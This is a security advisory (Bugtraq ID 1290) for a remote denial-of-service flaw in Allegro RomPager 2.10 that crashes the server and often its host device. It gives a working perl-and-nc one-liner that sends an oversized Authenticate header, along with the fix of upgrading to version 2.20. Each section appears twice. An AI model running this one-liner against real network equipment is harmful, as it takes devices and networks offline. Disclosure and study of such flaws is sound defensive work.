Allegro RomPager Malformed URL Request DoS Vulnerability
BID:1290
Info
Allegro RomPager Malformed URL Request DoS Vulnerability
| Bugtraq ID: | 1290 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 01 2000 12:00AM |
| Updated: | Jun 01 2000 12:00AM |
| Credit: | This was originally discovered in 1998. It was reposted to BugTraq on June 1, 2000 by netsec [davidv] <[email protected]>. |
| Vulnerable: |
Allegro RomPager 2.10 |
| Not Vulnerable: |
Allegro RomPager 2.20 |
Discussion
Allegro RomPager Malformed URL Request DoS Vulnerability
Allegro's RomPager is reported prone to a remote denial of service vulnerability.
If a specifically-malformed request is sent to Allegro's RomPager, it will crash, often crashing the parent device as well. In this manner, network hardware and possibly entire networks can be rendered unusable by any remote attacker using only a browser.
Allegro's RomPager is reported prone to a remote denial of service vulnerability.
If a specifically-malformed request is sent to Allegro's RomPager, it will crash, often crashing the parent device as well. In this manner, network hardware and possibly entire networks can be rendered unusable by any remote attacker using only a browser.
Exploit / POC
Allegro RomPager Malformed URL Request DoS Vulnerability
The following example is made available by Seth Alan Woolley:
$ ip_address="some.ip.add.ress"
$ ping $ip_address # works
the one-liner:
$ perl -e 'print "GET / HTTP/1.1\r\nHost: '"$ip_address"'\r\nAuthenticate: " . 'A' x 1024 . "\r\n\r\n"' | nc "$ip_address" 80
$ ping $ip_address # doesn't work
The following example is made available by Seth Alan Woolley:
$ ip_address="some.ip.add.ress"
$ ping $ip_address # works
the one-liner:
$ perl -e 'print "GET / HTTP/1.1\r\nHost: '"$ip_address"'\r\nAuthenticate: " . 'A' x 1024 . "\r\n\r\n"' | nc "$ip_address" 80
$ ping $ip_address # doesn't work
Solution / Fix
Allegro RomPager Malformed URL Request DoS Vulnerability
Solution:
RomPager 2.20 was released in December 1998 and is not susceptible to this problem. Users of affected equipment should contact the vendor of that equipment for fix information. Manufacturers of affected equipment should contact Allegro. Contact information for Allegro is available at http://www.allegrosoft.com
Solution:
RomPager 2.20 was released in December 1998 and is not susceptible to this problem. Users of affected equipment should contact the vendor of that equipment for fix information. Manufacturers of affected equipment should contact Allegro. Contact information for Allegro is available at http://www.allegrosoft.com